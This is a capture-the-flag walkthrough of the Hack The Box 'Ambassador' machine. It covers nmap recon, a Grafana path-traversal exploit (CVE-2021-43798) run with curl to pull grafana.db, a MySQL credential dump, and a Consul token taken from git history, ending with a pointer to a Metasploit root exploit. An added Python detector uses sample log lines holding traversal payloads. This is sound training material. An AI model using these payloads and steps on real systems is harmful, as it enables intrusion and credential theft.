[HTB] : Ambassador Walkthrough

Suvam Adhikari
5 min read · Jan 24, 2023

Initial Recon

nmap -A -v -oN nmapinit.txt 10.10.11.183
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 29:dd:8e:d7:17:1e:8e:30:90:87:3c:c6:51:00:7c:75 (RSA)
| 256 80:a4:c5:2e:9a:b1:ec:da:27:64:39:a4:08:97:3b:ef (ECDSA)
|_ 256 f5:90:ba:7d:ed:55:cb:70:07:f2:bb:c8:91:93:1b:f6 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-generator: Hugo 0.94.2
|_http-title: Ambassador Development Server
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
3000/tcp open ppp?
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 302 Found
| Cache-Control: no-cache
| Content-Type: text/html; charset=utf-8
| Expires: -1
| Location: /login
| Pragma: no-cache
| Set-Cookie: redirect_to=%2Fnice%2520ports%252C%2FTri%256Eity.txt%252ebak; Path=/; HttpOnly; SameSite=Lax
| X-Content-Type-Options: nosniff
| X-Frame-Options: deny
| X-Xss-Protection: 1; mode=block
| Date: Tue, 24 Jan 2023 03:45:38 GMT
| Content-Length: 29
| href="/login">Found</a>.
| GenericLines, Help, Kerberos, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 302 Found
| Cache-Control: no-cache
| Content-Type: text/html; charset=utf-8
| Expires: -1
| Location: /login
| Pragma: no-cache
| Set-Cookie: redirect_to=%2F; Path=/; HttpOnly; SameSite=Lax
| X-Content-Type-Options: nosniff
| X-Frame-Options: deny
| X-Xss-Protection: 1; mode=block
| Date: Tue, 24 Jan 2023 03:45:01 GMT
| Content-Length: 29
| href="/login">Found</a>.
| HTTPOptions:
| HTTP/1.0 302 Found
| Cache-Control: no-cache
| Expires: -1
| Location: /login
| Pragma: no-cache
| Set-Cookie: redirect_to=%2F; Path=/; HttpOnly; SameSite=Lax
| X-Content-Type-Options: nosniff
| X-Frame-Options: deny
| X-Xss-Protection: 1; mode=block
| Date: Tue, 24 Jan 2023 03:45:08 GMT
|_ Content-Length: 0
3306/tcp open mysql MySQL 8.0.30-0ubuntu0.20.04.2
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
| mysql-info:
| Protocol: 10
| Version: 8.0.30-0ubuntu0.20.04.2
| Thread ID: 77
| Capabilities flags: 65535
| Some Capabilities: Support41Auth, IgnoreSigpipes, DontAllowDatabaseTableColumn, IgnoreSpaceBeforeParenthesis, Speaks41ProtocolOld, SupportsTransactions, ConnectWithDatabase, SwitchToSSLAfterHandshake, LongColumnFlag, ODBCClient, InteractiveClient, FoundRows, Speaks41ProtocolNew, SupportsLoadDataLocal, LongPassword, SupportsCompression, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults
| Status: Autocommit
| Salt: Yg%%p
| w\x0C*M&\x0Bq#@So\x0Bo[
|_ Auth Plugin Name: caching_sha2_password
|_sslv2: ERROR: Script execution failed (use -d to debug)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jan 24 09:22:53 2023 -- 1 IP address (1 host up) scanned in 154.04 seconds

We can see that there are web servers running on ports 80 and 3000; the responses on 3000 (redirect to /login) come from Grafana.

After googling the Grafana version, I found that it was vulnerable to local file inclusion (path traversal) via CVE-2021-43798. So I searched for public exploits and tried dumping files from the remote host.

Some Sensitive Files

/var/lib/grafana/grafana.db
/etc/grafana/grafana.ini
/etc/passwd

Checking the grafana.ini file, I found the password for the Grafana admin login.

After that I downloaded the grafana.db file locally and opened it with sqlite3. The file contained the MySQL username and password.

curl http://10.10.11.183:3000/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../var/lib/grafana/grafana.db --path-as-is  --output database.db
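As an added defensive example (not part of the original post), the following Python check flags requests to Grafana's /public/plugins/ path that escape the plugin directory once percent-encoding is removed and the path is normalized, which is the shape of the request shown above. The log lines are constructed in Apache/nginx combined format and are not from the target.

```python
import re
import posixpath
from urllib.parse import unquote

# Constructed sample access-log lines (combined format); not from the original post.
SAMPLE_LOG = """\
10.10.14.5 - - [24/Jan/2023:03:46:10 +0000] "GET /public/plugins/alertlist/module.js HTTP/1.1" 200 4120 "-" "Mozilla/5.0"
10.10.14.5 - - [24/Jan/2023:03:46:12 +0000] "GET /public/plugins/alertlist/../../../../../../../../etc/passwd HTTP/1.1" 200 1834 "-" "curl/7.85.0"
10.10.14.5 - - [24/Jan/2023:03:46:15 +0000] "GET /public/plugins/alertlist/..%2f..%2f..%2f..%2fvar/lib/grafana/grafana.db HTTP/1.1" 200 622592 "-" "curl/7.85.0"
10.10.14.5 - - [24/Jan/2023:03:46:20 +0000] "GET /login HTTP/1.1" 200 31000 "-" "Mozilla/5.0"
"""

# Pulls the raw request line out of a combined-format log entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')
PLUGIN_PREFIX = "/public/plugins/"


def is_plugin_traversal(raw_path: str) -> bool:
    """True when a /public/plugins/<id>/... request resolves outside <id>/ after
    decoding (single or double percent-encoding) and normalization."""
    path = raw_path.split("?", 1)[0]
    if not path.startswith(PLUGIN_PREFIX):
        return False
    decoded = unquote(unquote(path))
    plugin_id = decoded[len(PLUGIN_PREFIX):].split("/", 1)[0]
    if not plugin_id:
        return False
    base = PLUGIN_PREFIX + plugin_id
    normalized = posixpath.normpath(decoded)
    # Anything that no longer sits under the requested plugin's directory escaped it.
    return not (normalized == base or normalized.startswith(base + "/"))


def find_traversal_requests(log_text: str) -> list[tuple[str, str]]:
    """Return (client_ip, raw_path) for every logged request that escapes its plugin dir."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if m and is_plugin_traversal(m.group("path")):
            hits.append((line.split(" ", 1)[0], m.group("path")))
    return hits


if __name__ == "__main__":
    for ip, path in find_traversal_requests(SAMPLE_LOG):
        print(f"traversal from {ip}: {path}")
```

The check must run on the raw request line as logged; a reverse proxy that normalizes the path before logging or forwarding will hide the traversal, so log at the first hop that sees the unmodified request.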

After logging in to MySQL, one of the tables contained the SSH credentials for the user developer.

mysql -h 10.10.11.183 -u grafana -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 8
Server version: 8.0.30-0ubuntu0.20.04.2 (Ubuntu)

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| grafana |
| information_schema |
| mysql |
| performance_schema |
| sys |
| whackywidget |
+--------------------+
6 rows in set (0.314 sec)

MySQL [(none)]> use whackywidget;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MySQL [whackywidget]> show tables;
+------------------------+
| Tables_in_whackywidget |
+------------------------+
| users |
+------------------------+
1 row in set (0.309 sec)

MySQL [whackywidget]> SELECT * FROM users;
+-----------+------------------------------------------+
| user | pass |
+-----------+------------------------------------------+
| developer | YW5FbmdsaredactedW5OZXdZb3JrMDI3NDY4Cg== |
+-----------+------------------------------------------+
1 row in set (0.309 sec)

MySQL [whackywidget]>

The home directory of developer contained a .gitconfig file that referred to /opt/my-app. This directory contained developer's development files. I ran git log to see the commit history.

One of the commits contained the token for the Consul service.

I checked all running services on the host and found that Consul was also running on port 8500.

developer@ambassador:~$ curl localhost:8500
Consul Agent: UI disabled. To enable, set ui_config.enabled=true in the agent configuration and restart.

So, I had to set up a port forward to reach the service running on 8500.

ssh -L 7234:127.0.0.1:8500 developer@10.10.11.183 -fN

Now the Consul service bound to 127.0.0.1:8500 on the target is reachable via localhost:7234. The Consul service had a Metasploit module to gain a root shell.
